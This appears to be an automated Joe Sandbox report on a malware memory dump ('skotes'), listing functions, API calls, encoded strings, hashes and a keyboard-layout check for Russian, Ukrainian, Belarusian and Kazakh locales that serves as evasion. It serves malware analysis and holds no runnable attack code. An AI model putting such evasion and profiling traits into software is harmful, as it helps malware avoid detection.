Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: EnumOpenValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 2571532894-3963862150
Opcode ID: 4f5149c46cb8c804e0e51556556b389bbb7fe9009a3220ab6231d5f9d36f11d2
Instruction ID: 94b933b25397a64d3062cd18526361d2cffc27646ecdf911bd67823feb248938
Opcode Fuzzy Hash: 4f5149c46cb8c804e0e51556556b389bbb7fe9009a3220ab6231d5f9d36f11d2
Instruction Fuzzy Hash: 83B1BC719002689BDB24DB64CC88BDEB7B9AF05340F5402D8F508E72D1DB74ABA8CF95

Function 00957D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00957ED3

Strings

JjsrQV==, xrefs: 00958092
JjssPV==, xrefs: 009581E2
JjssOl==, xrefs: 0095813A
JjsrPl==, xrefs: 0095828A

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
API String ID: 1721193555-3123340372
Opcode ID: c9812132d276f35b18dd96e2263f8d5dde12770812e617fcb82e920fe9f9b438
Instruction ID: c6cbaed224da12e633f954db055dbc180ce29eb8193086b79ed44d39763a6e99
Opcode Fuzzy Hash: c9812132d276f35b18dd96e2263f8d5dde12770812e617fcb82e920fe9f9b438
Instruction Fuzzy Hash: 13E11870E146449BDF14FB69CD1B39E7B61AB81724F94428CE819A73C2DB345F888BC2

Function 00991ABC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00991775: CreateFileW.KERNEL32(00000000,00000000,?,00991B65,?,?,00000000,?,00991B65,00000000,0000000C), ref: 00991792

__dosmaperr.LIBCMT ref: 00991BD7
GetFileType.KERNEL32(00000000), ref: 00991BE3
__dosmaperr.LIBCMT ref: 00991BF6
__dosmaperr.LIBCMT ref: 00991D9C

Strings

H, xrefs: 00991D21

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: __dosmaperr$File$CreateType
String ID: H
API String ID: 3443242726-2852464175
Opcode ID: 43bbe744a6918c5e953af3176214a1fde9d6788295e11dd082e6869b3ee65487
Instruction ID: 03e6b57b7c1d5e2a7fd041f7be119ff430dd3052fc3bfe7c9e51177adf58e2b3
Opcode Fuzzy Hash: 43bbe744a6918c5e953af3176214a1fde9d6788295e11dd082e6869b3ee65487
Instruction Fuzzy Hash: 98A14832A1414A4FDF19EF6CDC91BAE3BA5AB46324F240189F811AF3D1EB349C12C751

Function 00957590 Relevance: 4.7, APIs: 3, Instructions: 158
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064,031FA665,?,00000000,00999138,000000FF), ref: 009575CC
CreateThread.KERNEL32(00000000,00000000,00957430,009B8638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 009576BE
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009576C9

Part of subcall function 0096D0C7: RtlWakeAllConditionVariable.NTDLL ref: 0096D17B

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep$ConditionCreateThreadVariableWake
String ID:
API String ID: 79123409-0
Opcode ID: c41712e0e1532b3a22a5cb9b4226e4c9472bcc81594eb2e64a30b9445b814403
Instruction ID: 5e0d73254fa7bb286da6f6eb5ad229577bb8a3b296308ae95316b7b1512fe704
Opcode Fuzzy Hash: c41712e0e1532b3a22a5cb9b4226e4c9472bcc81594eb2e64a30b9445b814403
Instruction Fuzzy Hash: EA511470619248DFEB14CF28EE85B9E7BA9EB88324F504619F814873D1CB79D584CF51

Function 00986FB4 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00986EE6), ref: 00986FD6
GetFileInformationByHandle.KERNEL32(?,?), ref: 00987030
__dosmaperr.LIBCMT ref: 009870C5

Part of subcall function 0098732A: __dosmaperr.LIBCMT ref: 0098735F

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
